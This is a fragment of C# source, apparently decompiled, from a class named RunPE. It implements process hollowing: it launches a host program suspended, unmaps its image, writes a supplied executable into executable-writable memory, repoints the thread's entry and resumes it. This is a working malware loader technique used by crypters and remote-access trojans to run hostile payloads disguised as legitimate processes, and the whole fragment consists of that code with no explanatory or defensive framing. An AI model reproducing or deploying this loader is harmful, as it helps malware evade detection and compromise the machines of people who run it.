private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes,
IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment,
string currentDirectory, ref RunPE.STARTUP_INFORMATION startupInfo,
ref RunPE.PROCESS_INFORMATION processInformation);
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
{
int num = 0;
string text = string.Format("\"{0}\"", path);
RunPE.STARTUP_INFORMATION sTARTUP_INFORMATION = default(RunPE.STARTUP_INFORMATION);
RunPE.PROCESS_INFORMATION pROCESS_INFORMATION = default(RunPE.PROCESS_INFORMATION);
sTARTUP_INFORMATION.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION)));
bool result;
try
{
if (!string.IsNullOrEmpty(cmd))
{
text = text + " " + cmd;
}
if (!RunPE.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null,
ref sTARTUP_INFORMATION, ref pROCESS_INFORMATION))
{
throw new Exception();
}
int num2 = BitConverter.ToInt32(data, 60);
int num3 = BitConverter.ToInt32(data, num2 + 52);
int[] array = new int[179];
array[0] = 65538;
if (IntPtr.Size == 4)
{
if (!RunPE.GetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
if (!RunPE.Wow64GetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
int num4 = array[41];
int num5 = 0;
if (!RunPE.ReadProcessMemory(pROCESS_INFORMATION.ProcessHandle, num4 + 8, ref num5, 4, ref num))
{
throw new Exception();
}
if (num3 == num5)
{
if (RunPE.NtUnmapViewOfSection(pROCESS_INFORMATION.ProcessHandle, num5) != 0)
{
throw new Exception();
}
}
int length = BitConverter.ToInt32(data, num2 + 80);
int bufferSize = BitConverter.ToInt32(data, num2 + 84);
bool flag = false;
int num6 = RunPE.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle, num3, length, 12288, 64);
if (!compatible && num6 == 0)
{
flag = true;
num6 = RunPE.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle, 0, length, 12288, 64);
}
if (num6 == 0)
{
throw new Exception();
}
if (!RunPE.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num))
{
throw new Exception();
}
int num7 = num2 + 248;
short num8 = BitConverter.ToInt16(data, num2 + 6);
for (int i = 0; i <= (int)(num8 - 1); i++)
{
int num9 = BitConverter.ToInt32(data, num7 + 12);
int num10 = BitConverter.ToInt32(data, num7 + 16);
int srcOffset = BitConverter.ToInt32(data, num7 + 20);
if (num10 != 0)
{
byte[] array2 = new byte[num10];
Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
if (!RunPE.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num6 + num9, array2,
array2.Length, ref num))
{
throw new Exception();
}
}
num7 += 40;
}
byte[] bytes = BitConverter.GetBytes(num6);
if (!RunPE.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num4 + 8, bytes, 4, ref num))
{
throw new Exception();
}
int num11 = BitConverter.ToInt32(data, num2 + 40);
if (flag)
{
num6 = num3;
}
array[44] = num6 + num11;
if (IntPtr.Size == 4)
{
if (!RunPE.SetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
if (!RunPE.Wow64SetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
if (RunPE.ResumeThread(pROCESS_INFORMATION.ThreadHandle) == -1)
{
throw new Exception();
}
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
Process processById = Process.GetProcessById(Convert.ToInt32(pROCESS_INFORMATION.ProcessId));
if (processById != null)
{
processById.Kill();
}
result = false;
return(result);
}
result = true;
return(result);
}
